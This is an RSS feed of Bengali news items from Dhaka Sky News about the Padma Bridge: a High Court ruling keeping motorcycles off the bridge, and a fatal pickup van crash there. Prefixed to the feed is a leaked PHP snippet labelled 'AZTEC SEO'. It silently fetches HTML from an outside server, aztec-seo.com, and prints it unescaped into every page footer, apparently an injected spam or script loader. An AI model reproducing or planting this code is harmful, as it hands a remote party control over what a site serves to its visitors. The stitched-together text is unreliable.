/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পদ্মা সেতু – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Sun, 15 Jan 2023 10:55:02 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 পদ্মা সেতুতে বন্ধই থাকবে মোটরসাইকেল চলাচল : হাইকোর্ট https://www.dhakaskynews.com/bangladesh/2023/01/15/News_ID-3667/ https://www.dhakaskynews.com/bangladesh/2023/01/15/News_ID-3667/#respond Sun, 15 Jan 2023 10:55:02 +0000 https://www.dhakaskynews.com/?p=3667 পদ্মা সেতুতে মোটরসাইকেল চলাচলের নির্দেশনা চেয়ে দায়ের করা রিটটি খারিজ করে দিয়েছেন হাইকোর্ট। ১৫ জানুয়ারি রোববার বিচারপতি মো. খসরুজ্জামান ও বিচারপতি মো. ইকবাল কবিরের সমন্বয়ে গঠিত হাইকোর্ট বেঞ্চ রিটটি খারিজ করে দেন। রিটটির পক্ষের আইনজীবী ছিলেন ইয়ারুল ইসলাম।

বাংলাদেশ রিপাবলিক্যান পার্টি নামে একটি সংগঠনের চেয়ারম্যান যাত্রাবাড়ীর বাসিন্দা আবু হানিফ হৃদয় জনস্বার্থে এ রিট করেছিলেন। এর আগে গত ১২ জানুয়ারি করা এ রিটে পদ্মা সেতুতে মোটরসাইকেল চলাচল বন্ধের সিদ্ধান্তের বৈধতা চ্যালেঞ্জ করা হয়। রিটে সড়ক পরিবহণ ও সেতু মন্ত্রণালয়ের সচিব, বাংলাদেশ সেতু কর্তৃপক্ষসহ সংশ্লিষ্টদের রিটে বিবাদী করা হয়।

গত বছরের ২৭ জুন পদ্মা সেতুতে মোটরসাইকেল চলাচল নিষিদ্ধ ঘোষণা করে সরকার। ২৬ জুন রাতে তথ্য অধিদপ্তরের এক তথ্য বিবরণীতে বিষয়টি জানানো হয়। এতে বলা হয়, পুনঃআদেশ না দেওয়া পর্যন্ত পদ্মা সেতুতে মোটরসাইকেল চলাচল বন্ধ থাকবে। এর আগে যান চলাচলের প্রথম দিনেই পদ্মা সেতুতে মোটরসাইকেল দুর্ঘটনা ঘটে। এতে হতাহতের ঘটনা ঘটে। এ দুর্ঘটনার একটি ভিডিও সামাজিক যোগাযোগমাধ্যমে ছড়িয়ে পড়ে।

]]>
https://www.dhakaskynews.com/bangladesh/2023/01/15/News_ID-3667/feed/ 0
সিলিন্ডারবোঝাই ভ্যান উল্টে নিহত ২ https://www.dhakaskynews.com/bangladesh/2022/07/18/News_ID-3056/ https://www.dhakaskynews.com/bangladesh/2022/07/18/News_ID-3056/#respond Mon, 18 Jul 2022 05:53:48 +0000 https://www.dhakaskynews.com/?p=3056 পদ্মা সেতুর মাওয়া প্রান্তে একটি পিকআপ ভ্যান নিয়ন্ত্রণ হারিয়ে উল্টে যায়। এতে ২ জন নিহত ও তিনজন আহত হয়েছেন।

নিহতরা হলেন- কাউসার ও রাজু। এর মধ্যে কাউসার পিকআপের হেলপার ও রাজু পিকআপের মালিকের ভাই বলে জানা গেছে। পিকআপটি জাজিরা থেকে ঢাকার উদ্দেশে যাচ্ছিল বলে জানা গেছে।

দুর্ঘটনার পর পদ্মা সেতু দিয়ে ঢাকামুখী যানবাহন চলাচল আধাঘণ্টা বন্ধ ছিল। পিকআপটি সরিয়ে নেওয়ার পর যান চলাচল স্বাভাবিক হয়।

রোববার ১৭ জুলাই রাত সোয়া ১০টার দিকে পদ্মা সেতুর মাওয়া প্রান্তের ১৪ নম্বর পিলারের অংশে এই দুর্ঘটনা ঘটে।

শ্রীনগর স্বাস্থ্য কমপ্লেক্সের দায়িত্বরত চিকিৎসক ডা. আসাদুজ্জামান দুজন নিহতের খবর নিশ্চিত করে জানান, গুরুতর আহত অবস্থায় আরও তিন জনকে ঢাকা মেডিক্যাল কলেজ হাসপাতালে পাঠানো হয়েছে। তাদের মধ্যে শিশুও রয়েছে।

মুন্সীগঞ্জ ট্রাফিক পুলিশের টিআই বজলুল রহমান জানান, শরীয়তপুর থেকে ঢাকাগামী এলপি গ্যাসবাহী একটি পিকআপভ্যান নিয়ন্ত্রণ হারিয়ে ১৪ নম্বর পিলারের কাছে উল্টে যায়। এই ঘটনায় মুমূর্ষু অবস্থায় কয়েকজনকে শ্রীনগর স্বাস্থ্য কমপ্লেক্সে পাঠানো হয়েছে।

পদ্মা সেতু উত্তর থানার ওসি আলমগীর হোসেন জানান, এই ঘটনায় দুজন নিহত হয়েছেন ও আহত হয়েছেন কয়েকজন।

]]>
https://www.dhakaskynews.com/bangladesh/2022/07/18/News_ID-3056/feed/ 0